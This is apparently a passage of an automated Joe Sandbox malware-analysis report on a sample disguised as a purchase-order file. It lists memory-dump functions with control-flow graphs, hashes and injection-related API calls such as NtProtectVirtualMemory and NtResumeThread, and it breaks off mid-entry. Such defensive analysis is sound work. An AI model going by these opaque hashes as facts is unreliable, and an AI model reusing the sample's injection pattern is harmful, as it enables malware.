                                                                  control_flow_graph 797 583e6a0-583e6c1 801 583e6c3 797->801 802 583e6c8-583e758 call 583f1f0 797->802 801->802 809 583e75e-583e79b 802->809 811 583e7aa 809->811 812 583e79d-583e7a8 809->812 813 583e7b4-583e8cf 811->813 812->813 824 583e8e1-583e90c 813->824 825 583e8d1-583e8d7 813->825 826 583f0d4-583f0f0 824->826 825->824 827 583e911-583ea74 call 583d1b8 826->827 828 583f0f6-583f111 826->828 839 583ea86-583ec17 call 583a6f8 call 58371d8 827->839 840 583ea76-583ea7c 827->840 852 583ec19-583ec1d 839->852 853 583ec7c-583ec86 839->853 840->839 854 583ec25-583ec77 852->854 855 583ec1f-583ec20 852->855 856 583eead-583eecc 853->856 857 583ef52-583efbd 854->857 855->857 858 583eed2-583eefc 856->858 859 583ec8b-583edd1 call 583d1b8 856->859 876 583efcf-583f01a 857->876 877 583efbf-583efc5 857->877 865 583ef4f-583ef50 858->865 866 583eefe-583ef4c 858->866 888 583edd7-583eea3 call 583d1b8 859->888 889 583eea6-583eea7 859->889 865->857 866->865 879 583f020-583f0b8 876->879 880 583f0b9-583f0d1 876->880 877->876 879->880 880->826 888->889 889->856
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8
                                                                  • API String ID: 0-4194326291
                                                                  • Opcode ID: e2aaf77b8fc9a2dd3957bae860231ff026c1c2ca811665334c826f08d64714ae
                                                                  • Instruction ID: b961869182f98ae00fe1474a2434f904c8f9c5d6e3dde8c701de3a6af6197622
                                                                  • Opcode Fuzzy Hash: e2aaf77b8fc9a2dd3957bae860231ff026c1c2ca811665334c826f08d64714ae
                                                                  • Instruction Fuzzy Hash: A852D575E00629CFDB64DF69C850AD9B7B1FB99300F1086EAD909A7354DB706E85CF80
                                                                  Function 064E7490 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 897 64e7490-64e74aa 898 64e74ac-64e74b3 897->898 899 64e74b6-64e74c2 897->899 901 64e751e-64e7521 899->901 902 64e74c4-64e74c8 899->902 903 64e7534-64e7537 901->903 904 64e7523-64e7525 901->904 905 64e74ce-64e74d1 902->905 906 64e755d-64e7560 903->906 907 64e7539-64e7557 903->907 908 64e752d 904->908 909 64e76ef-64e7727 905->909 910 64e74d7-64e7507 905->910 911 64e7566-64e756c 906->911 912 64e76e5-64e76ec 906->912 907->906 916 64e772e-64e7779 907->916 908->903 909->916 938 64e7509-64e7512 910->938 939 64e7514-64e7517 910->939 911->912 914 64e7572-64e757b 911->914 919 64e757d-64e758c 914->919 920 64e75b3-64e75b9 914->920 944 64e777b-64e7788 916->944 945 64e77b2-64e77b4 916->945 919->920 931 64e758e-64e75a7 919->931 924 64e75bf-64e75c8 920->924 925 64e76c4-64e76ca 920->925 924->925 936 64e75ce-64e75da 924->936 925->912 928 64e76cc-64e76dc 925->928 928->912 941 64e76de-64e76e3 928->941 931->920 943 64e75a9-64e75ac 931->943 947 64e7678-64e76bc 936->947 948 64e75e0-64e7608 936->948 938->901 939->901 941->912 943->920 944->945 953 64e778a-64e77b0 944->953 949 64e7bff-64e7c06 945->949 947->925 948->947 960 64e760a-64e7647 948->960 953->945 963 64e77b9-64e77ed 953->963 960->947 974 64e7649-64e7676 960->974 972 64e77f3-64e77fc 963->972 973 64e7890-64e789f 963->973 975 64e7c07-64e7c11 972->975 976 64e7802-64e7815 972->976 980 64e78de 973->980 981 64e78a1-64e78b7 973->981 974->925 987 64e7c13 975->987 988 64e7c61-64e7c64 975->988 984 64e787e-64e788a 976->984 985 64e7817-64e7830 976->985 983 64e78e0-64e78e5 980->983 1000 64e78b9-64e78d5 981->1000 1001 64e78d7-64e78dc 981->1001 989 64e7928-64e7944 983->989 990 64e78e7-64e7908 983->990 984->972 984->973 985->984 1021 64e7832-64e7840 985->1021 994 64e7c39-64e7c3a 987->994 991 64e7c4e-64e7c4f 988->991 992 64e7c65-64e7c6c 988->992 1006 64e7a0c-64e7a15 989->1006 1007 64e794a-64e7953 989->1007 990->989 1030 64e790a 990->1030 991->994 997 64e7c50-64e7c57 991->997 1013 64e7c6e-64e7c73 992->1013 1014 64e7c75-64e7c81 992->1014 995 64e7c3c-64e7c4b 994->995 996 64e7bd8-64e7be3 call 64e4b50 994->996 995->991 1016 64e7bfb 996->1016 1017 64e7be5-64e7beb 996->1017 1018 64e7c59-64e7c5e 997->1018 1019 64e7c60 997->1019 1000->983 1001->983 1023 64e7bfd 1006->1023 1024 64e7a1b 1006->1024 1007->975 1015 64e7959-64e7976 1007->1015 1022 64e7cb9-64e7cbb 1013->1022 1037 64e7c8a-64e7c96 1014->1037 1038 64e7c83-64e7c88 1014->1038 1053 64e797c-64e7992 1015->1053 1054 64e79fa-64e7a06 1015->1054 1016->949 1028 64e7bef-64e7bf1 1017->1028 1029 64e7bed 1017->1029 1018->1022 1019->988 1021->984 1041 64e7842-64e7846 1021->1041 1023->949 1025 64e7a29-64e7a37 call 64e4b50 1024->1025 1026 64e7a86-64e7a94 call 64e4b50 1024->1026 1027 64e7a22-64e7a24 1024->1027 1043 64e7a4f-64e7a56 1025->1043 1044 64e7a39-64e7a41 1025->1044 1046 64e7aac-64e7ac3 call 64e4b50 1026->1046 1047 64e7a96-64e7a9e 1026->1047 1027->949 1028->1016 1029->1016 1035 64e790d-64e7926 1030->1035 1035->989 1050 64e7c9f-64e7cab 1037->1050 1051 64e7c98-64e7c9d 1037->1051 1038->1022 1041->975 1049 64e784c-64e7865 1041->1049 1043->949 1044->1043 1063 64e7adb-64e7aee call 64e4b50 1046->1063 1064 64e7ac5-64e7acd 1046->1064 1047->1046 1049->984 1069 64e7867-64e787b call 64e3980 1049->1069 1066 64e7cad-64e7cb2 1050->1066 1067 64e7cb4 1050->1067 1051->1022 1053->1054 1074 64e7994-64e79a2 1053->1074 1054->1006 1054->1007 1076 64e7b06-64e7b23 call 64e4b50 1063->1076 1077 64e7af0-64e7af8 1063->1077 1064->1063 1066->1022 1067->1022 1069->984 1074->1054 1082 64e79a4-64e79a8 1074->1082 1088 64e7b3b 1076->1088 1089 64e7b25-64e7b2d 1076->1089 1077->1076 1082->975 1084 64e79ae-64e79d7 1082->1084 1084->1054 1093 64e79d9-64e79f7 call 64e3980 1084->1093 1088->949 1089->1088 1093->1054
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: U
                                                                  • API String ID: 0-3372436214
                                                                  • Opcode ID: 1021fce7a6f621b0843a09e85588fd2f57c27a5627cd5097dcbf45a7539f5b2c
                                                                  • Instruction ID: 3ceaa62606b8c978914cc762866ebb83958e56a044ec051c40f6a966d358fac6
                                                                  • Opcode Fuzzy Hash: 1021fce7a6f621b0843a09e85588fd2f57c27a5627cd5097dcbf45a7539f5b2c
                                                                  • Instruction Fuzzy Hash: 7D325C30B00205CFDB55DF29C894A6AB7F6FF89726B1584AAE506CB361DB31EC41CB51
                                                                  Function 064E3E47 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: f18e5c9da29821e45fcd305df1dbabfa980db683a315b8ca56b4a80edaf3cda4
                                                                  • Instruction ID: 28f282746749b246c49aa85c6dfbf4d838ac8048cd540af62b1334944f1a1263
                                                                  • Opcode Fuzzy Hash: f18e5c9da29821e45fcd305df1dbabfa980db683a315b8ca56b4a80edaf3cda4
                                                                  • Instruction Fuzzy Hash: B722F734A00218CFDB65DFA4C994BADB7F2BF48701F1581AAE509AB3A5DB709D81CF50
                                                                  Function 066A1C81 Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1993 66a1c81-66a1d1e NtProtectVirtualMemory 1996 66a1d20-66a1d26 1993->1996 1997 66a1d27-66a1d4c 1993->1997 1996->1997
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066A1D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: b67ebd33260766157fdf2b5b14f2ab77eedb892332827f26c38668b0cb98b596
                                                                  • Instruction ID: 6fcc5f5412879f141b818bb39e89e718e41521b869b5dd502c465fa8d2a75d7a
                                                                  • Opcode Fuzzy Hash: b67ebd33260766157fdf2b5b14f2ab77eedb892332827f26c38668b0cb98b596
                                                                  • Instruction Fuzzy Hash: 7C21EFB1D01349DFDB10DFAAD984AAEFBF5BF48310F20842AE519A7200C7749944CBA0
                                                                  Function 066A1C88 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066A1D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 5300d4410c160884e9b3ac4b6397a1c372ede806909d12bf25890c7eaefca336
                                                                  • Instruction ID: 8ad54c5793161b605bb92b38dd0c87b175183cd409de10de240c890159321bb8
                                                                  • Opcode Fuzzy Hash: 5300d4410c160884e9b3ac4b6397a1c372ede806909d12bf25890c7eaefca336
                                                                  • Instruction Fuzzy Hash: FE21DFB1D01349DFDB10DFAAD884AAEFBF5FF48310F60842AE519A7240D775A944CBA4
                                                                  Function 066A4B30 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 066A4BA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 48b0fa0a4a749dce7cd03195f6c012461b34e9a2a795e2f169164fde1462d836
                                                                  • Instruction ID: aae4500ad98e814ad6de2fbec3364216b13b899598c9eef0758b3ad20783236e
                                                                  • Opcode Fuzzy Hash: 48b0fa0a4a749dce7cd03195f6c012461b34e9a2a795e2f169164fde1462d836
                                                                  • Instruction Fuzzy Hash: 741133B1D00309CEDB10DFAAC8847AFFBF4AF88320F50842EC519A7240D778A9458FA0
                                                                  Function 066A4B38 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 066A4BA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 6ac8261c57e788ab043bed539ecd8d5482eebb04fcfa9747cf7a6b24b14ccd9d
                                                                  • Instruction ID: 49e7f3fcd14a13a04a9b40ac1953e5a46a7d142704701f803b8d8dfa2cf20110
                                                                  • Opcode Fuzzy Hash: 6ac8261c57e788ab043bed539ecd8d5482eebb04fcfa9747cf7a6b24b14ccd9d
                                                                  • Instruction Fuzzy Hash: 3F1117B1D003498FDB10DFAAD8847AEFBF4AF88210F54842ED519A7240D774A945CFA0
                                                                  Function 0583E5C5 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h
                                                                  • API String ID: 0-2439710439
                                                                  • Opcode ID: 7c8202f6128bf0028d2216204aee55c30459b4844d96a47d7cb3b61cd54bdb40
                                                                  • Instruction ID: 55c14e832eacf18102ea72cf47fa5e395768d7a883e736381564d7dc8ef9f688
                                                                  • Opcode Fuzzy Hash: 7c8202f6128bf0028d2216204aee55c30459b4844d96a47d7cb3b61cd54bdb40
                                                                  • Instruction Fuzzy Hash: A3A17C71D04668CFDB24DF69DC50AD9BBB6FF89300F0481AAD948AB251EB705E85CF90
                                                                  Function 0583E685 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h
                                                                  • API String ID: 0-2439710439
                                                                  • Opcode ID: 3fe9da55414cf9d7478a251d1e4019a9143e54c62b36a7b06974bc652d829799
                                                                  • Instruction ID: c8c1f8cc104c494de5c94226dc1dd2b4f804db269f780f98a45596d9a056d0dd
                                                                  • Opcode Fuzzy Hash: 3fe9da55414cf9d7478a251d1e4019a9143e54c62b36a7b06974bc652d829799
                                                                  • Instruction Fuzzy Hash: 60810671D056598FDB64DF69CC50BDABBB2FF89300F0082AAD909A7255DB306E85CF90
                                                                  Function 06580040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506566390.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6580000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J
                                                                  • API String ID: 0-1141589763
                                                                  • Opcode ID: cd77a1ef793f67baf694a501ebd0911ba4445906f6415d669d48f449e13e4298
                                                                  • Instruction ID: 699db64486dd5e4139ec701792b50c3ca247805c53ec731bf2770b1178c84b18
                                                                  • Opcode Fuzzy Hash: cd77a1ef793f67baf694a501ebd0911ba4445906f6415d669d48f449e13e4298
                                                                  • Instruction Fuzzy Hash: CA3196B1D156288FEB69DF6BDC4069DBAFBBFC8204F04D1AA9408B6254DB700B85CF40
                                                                  Function 0698E2B0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69508094074.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6970000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PZT
                                                                  • API String ID: 0-3004033766
                                                                  • Opcode ID: 4213a04851453fade370ba81e4db7a1b951266ad96403998f299e460940c0945
                                                                  • Instruction ID: 335b8242be6b73fd4a0694f5d2ce548def7cc5c25f9c6fbe4684e33d6e184cb8
                                                                  • Opcode Fuzzy Hash: 4213a04851453fade370ba81e4db7a1b951266ad96403998f299e460940c0945
                                                                  • Instruction Fuzzy Hash: B2315B70A05618CFEBA4DF29D855BADB7F2BB48300F0184EAE50AA7751DB349D81CF41
                                                                  Function 06484C78 Relevance: 1.0, Instructions: 983COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 346b249aa64fbbcf79fe24cbd8fe80c52e471394a96fd8ff92ea9e625d109325
                                                                  • Instruction ID: 43b9a4f5b1ead260ee303dfeee66c8332688c7af22fa24fdab4af5aa66851961
                                                                  • Opcode Fuzzy Hash: 346b249aa64fbbcf79fe24cbd8fe80c52e471394a96fd8ff92ea9e625d109325
                                                                  • Instruction Fuzzy Hash: 4BA2B375E00228CFDB65DF69C984A9DBBB2BF89304F1581E9D509AB325DB319E81CF40
                                                                  Function 066B3E58 Relevance: .6, Instructions: 601COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b2f64526c7530b10c5cc07bc8c0f6d54ad306dd67ac05070d5b1795aa81f931
                                                                  • Instruction ID: 5a8953099b5085f2043923dba45420eb2f294bf11dca8dd1efd98118eed73dd3
                                                                  • Opcode Fuzzy Hash: 8b2f64526c7530b10c5cc07bc8c0f6d54ad306dd67ac05070d5b1795aa81f931
                                                                  • Instruction Fuzzy Hash: 19325770B00615CFDB58DFA9C494AAEBBF2FB88300F14852AD55A97386DB30A951CB85
                                                                  Function 064889AB Relevance: .5, Instructions: 539COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f59085ea1510274c118e0f06017f8d167a86a0b46765e0c26cbbe15114305987
                                                                  • Instruction ID: 7f90988200566b0936769d192d0a62e5ab99155960bd14fb0f03760d3094f38f
                                                                  • Opcode Fuzzy Hash: f59085ea1510274c118e0f06017f8d167a86a0b46765e0c26cbbe15114305987
                                                                  • Instruction Fuzzy Hash: 1E528274A046288FCBA4DF28C994BAAB7F2FB49301F1091D9D90DA7355DB30AE85CF51
                                                                  Function 0648F628 Relevance: .4, Instructions: 435COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74aaba97448127105c831de4f7c527b5f3dfd4949f4dabc94bffacae8d4bad97
                                                                  • Instruction ID: ea3a6b13f256c198c947d58364ab57b1096a60e8b33ca2a9653c8cbf2a1da8d4
                                                                  • Opcode Fuzzy Hash: 74aaba97448127105c831de4f7c527b5f3dfd4949f4dabc94bffacae8d4bad97
                                                                  • Instruction Fuzzy Hash: 1D12B270E05218CFDBA4EF69C844BAEB7F2EB89340F1081AAD509A7755DB705D8ACF50
                                                                  Function 066B97F0 Relevance: .3, Instructions: 322COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2501c1e7d3d7c16f87f4aaad52395454166323bf6494be93ec0c802376362497
                                                                  • Instruction ID: db999e8da2777a7c11bb3603bb5ceb2e80e1d02dac92c56bf4fc52504897441b
                                                                  • Opcode Fuzzy Hash: 2501c1e7d3d7c16f87f4aaad52395454166323bf6494be93ec0c802376362497
                                                                  • Instruction Fuzzy Hash: 60E1F770E04218CFEBA4DF69D844BEEBBF2BB4A300F1092A9D649A7355DB705985CF41
                                                                  Function 066B97DF Relevance: .3, Instructions: 316COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62534fe9fcce703df15a25206b63bdeb5ff0e38d6c8dab2816e8e9be74c79f8f
                                                                  • Instruction ID: 9028983dd49349f55517adf214064874412f876242da30dc501cfda32d2ce2c7
                                                                  • Opcode Fuzzy Hash: 62534fe9fcce703df15a25206b63bdeb5ff0e38d6c8dab2816e8e9be74c79f8f
                                                                  • Instruction Fuzzy Hash: 38E1F670E04218CFEBA4DF69D884BEEBBF2BB4A300F1491A9D649A7355DB705985CF40
                                                                  Function 065874B0 Relevance: .3, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506566390.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6580000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69200d75568b90f039afb438e83e75f42f7afe0d1ca5aa666282301b7ae0da4d
                                                                  • Instruction ID: 369b787226df788cbed48bc9f94deb4e77a5c34d1ab6247d2ee3d57b3924ab86
                                                                  • Opcode Fuzzy Hash: 69200d75568b90f039afb438e83e75f42f7afe0d1ca5aa666282301b7ae0da4d
                                                                  • Instruction Fuzzy Hash: 5CB1F770E05218CFEB94DF69D884BADBBF2FF89304F2084A9D409A7661DB705985CF40
                                                                  Function 065874A0 Relevance: .3, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506566390.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6580000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f00a3bfc88ff972ece767dd685ac877808923453baae9a2003931ceac882e145
                                                                  • Instruction ID: 515e75657dde9099301cc13bc19a7d1b45938e6b42c1a9f3744a83551b0ef61e
                                                                  • Opcode Fuzzy Hash: f00a3bfc88ff972ece767dd685ac877808923453baae9a2003931ceac882e145
                                                                  • Instruction Fuzzy Hash: 6CB1F770E05218CFEB94DFA9D884B9DBBF2FF89304F2084A9D409A7665DB705985CF50
                                                                  Function 066BE308 Relevance: .2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56a6ba4e695054503207c5e8bfbfb9ea6eb08fa1dee8135c195aa52b3527eef8
                                                                  • Instruction ID: 8060a3a45fac848d7b62431924cdc11459faa74f790f76e166cd4059d1ccfb85
                                                                  • Opcode Fuzzy Hash: 56a6ba4e695054503207c5e8bfbfb9ea6eb08fa1dee8135c195aa52b3527eef8
                                                                  • Instruction Fuzzy Hash: 75A1F170A04208CFDB94DFA8D484BEEB7F2FB49300F5090A9D519AB696DB75A985CF40
                                                                  Function 066BE318 Relevance: .2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58239b2ddaff22d29083e200fd4db91d09067be275280ae48a1f711736276c7a
                                                                  • Instruction ID: 6654c46f679602f536616f96f9c774b5c93a29bc17ba8653f020483fe356f991
                                                                  • Opcode Fuzzy Hash: 58239b2ddaff22d29083e200fd4db91d09067be275280ae48a1f711736276c7a
                                                                  • Instruction Fuzzy Hash: 84A1F170A04208CFDB94DFA8D444BEEBBF2FB49300F10A0A9D519AB796DB755985CF40
                                                                  Function 066BE497 Relevance: .2, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a657503c23e5cf26d002084cdd7774fa0fd5b9010a38dd89bb25ebbe2f6c3b76
                                                                  • Instruction ID: a00380db51bd72c8f785c27c388e1bec0b96904c8cc618898ed14e6828fcc902
                                                                  • Opcode Fuzzy Hash: a657503c23e5cf26d002084cdd7774fa0fd5b9010a38dd89bb25ebbe2f6c3b76
                                                                  • Instruction Fuzzy Hash: 3F91D170E04208CFDB94DFA8D484BEEB7F2FB49340F1090A9D519AB696DB75A985CF40
                                                                  Function 00E5A041 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69484398217.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_e50000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 706b3e9b9d3bb457083814af24dc9414a4723f89b9fa39c3f9398689225a7db8
                                                                  • Instruction ID: a93f196ab9072b02e1d225e9317e3f37da9340b0906b7af2c230f1f5467623d5
                                                                  • Opcode Fuzzy Hash: 706b3e9b9d3bb457083814af24dc9414a4723f89b9fa39c3f9398689225a7db8
                                                                  • Instruction Fuzzy Hash: 8051C274D0522CCFEB24CF25C944BD9B7B1BB49301F149AE5D809A3261DB345AC9CF51
                                                                  Function 00E5A067 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69484398217.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_e50000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b7c61ef4403c4746688d1d693eb4f33ee46549f933f1e32c53de0094d13dbfe
                                                                  • Instruction ID: 00ba250e157286c37bc75b773cfebee4fab3f501e7a5eb723e03711d4ba30af9
